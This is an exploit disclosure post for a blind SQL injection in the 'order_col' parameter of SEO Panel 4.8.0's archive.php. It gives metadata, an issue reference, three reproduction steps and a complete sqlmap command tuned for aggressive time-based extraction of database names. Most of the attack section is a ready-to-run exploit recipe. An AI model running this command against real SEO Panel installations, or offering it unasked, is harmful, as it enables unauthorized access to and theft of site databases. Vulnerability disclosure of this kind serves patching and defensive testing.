SEO Panel 4.8.0 SQL Injection

SEO Panel version 4.8.0 suffers from a remote blind SQL injection vulnerability.


MD5 | 344494c053a1a99889952df5b5c8c6af

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection
# Date: 17/02/2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: 4.8.0


# Reference - https://github.com/seopanel/Seo-Panel/issues/209

Step 1 - Login to the SEO Panel with admin credentials.
Step 2 - Go to archive.php
Step 3 - Change "order_col" value to "*" and copy the request
Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL
--dbs --technique=T --flush-session


Related Posts